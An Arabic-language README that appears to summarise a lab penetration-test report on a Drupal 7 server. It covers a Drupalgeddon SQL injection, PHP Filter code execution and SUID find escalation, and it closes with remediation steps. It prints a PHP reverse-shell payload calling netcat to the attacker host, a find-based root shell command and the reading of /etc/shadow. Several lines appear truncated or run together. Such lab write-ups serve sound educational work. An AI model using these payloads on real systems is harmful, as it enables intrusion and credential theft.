
تدقيق أمني من نوع الصندوق الأسود لخادم Drupal 7. عرض توضيحي لسلسلة القتل الكاملة: حقن SQL (CVE-2014-3704) ➔ RCE ➔ Reverse Shell ➔ التصعيد إلى الجذر (SUID). يحتوي هذا المستودع على التقرير الفني المفصل، وأدلة الاستغلال (PoC)، وإجراءات المعالجة لتأمين البنية التحتية.
تم تنفيذ هذا المشروع في بيئة مختبرية خاضعة للرقابة ومعزولة لأغراض تعليمية وأكاديمية. لم يتم استهداف أي بنية تحتية حقيقية. الهدف هو تعلم تأمين الأنظمة من خلال فهم آليات الهجوم.
الهدف من هذا المشروع هو إجراء تدقيق في الصندوق الأسود (Black Box). وهذا يعني أن التحليل يبدأ دون أي معرفة مسبقة بالهدف: لم يتم تقديم أي معرّفات أو وثائق تقنية أو كود مصدر.
تم نشر البنية التحتية افتراضيًا على VMware في شبكة خاصة معزولة (Host-Only) لتجنب أي تفاعل مع الخارج.
192.168.78.131
192.168.78.132
تكونت الخطوة الأولى من رسم خريطة سطح الهجوم للجهاز المستهدف باستخدام فحص المنافذ.
الأمر المنفذ: nmap -sV 192.168.78.132

الخدمات المحددة:
كشف تحليل خدمة الويب (المنفذ 80) وملف robots.txt عن وجود نظام إدارة محتوى دروبال. وسمح فحص الكود المصدري بتحديد إصدار قديم: دروبال 7.x.
أظهرت نتائج مرحلة الاستطلاع سطح هجوم حرج: نظام إدارة محتوى دروبال 7 غير مُدار. هذا الإصدار معروف تاريخيًا بكونه عرضة لثغرات أمنية كبيرة (خاصة "Drupalgeddon").
في مواجهة هذه الملاحظة، توجه التدقيق نحو بحث مستهدف عن ثغرات عامة (CVE). أكد هذا التعداد وجود سلسلة استغلال كاملة، تسمح بالانتقال من زائر ويب عادي إلى مسؤول نظام "الجذر".
نواقل الهجوم المحددة:
استغلال الثغرة CVE-2014-3704 (Drupalgeddon). تسمح هذه الثغرة في واجهة برمجة تطبيقات قاعدة بيانات دروبال بحقن أوامر SQL دون مصادقة.
users بصلاحيات المسؤول.
بمجرد الاتصال كمسؤول، استخدام الوحدة الأصلية PHP Filter. هذه الوحدة، التي تم تكوينها بشكل خاطئ، تسمح بتنفيذ كود PHP عشوائي في صفحات الموقع.
<?php system('nc -e /bin/bash 192.168.78.131 4444'); ?>www-data).
تحليل الملفات التي تمتلك صلاحية SUID (Set User ID). اكتشاف تكوين خطير على الأمر find.
find . -exec '/bin/sh' \;find كجذر، مما يطلق شل بصلاحيات الجذر (uid=0).بمجرد الحصول على الوصول كجذر، قراءة الملف الحساس /etc/shadow لاستخراج بصمات (هاشات) كلمات مرور المستخدمين.

كشف التدقيق عن مستوى خطر حرج. إن الجمع بين نظام إدارة محتوى قديم وإهمال في تكوين النظام (SUID) يسمح بالاختراق الكامل للخادم.
التأثيرات على المؤسسة:
/etc/shadow).خطة العمل ذات الأولوية:
chmod u-s /usr/bin/find).للحصول على التفاصيل التقنية الكاملة والسكريبتات المستخدمة والتحليل المتعمق، راجع التقرير الكامل: قراءة تقرير التدقيق (PDF)
Fabien MOINE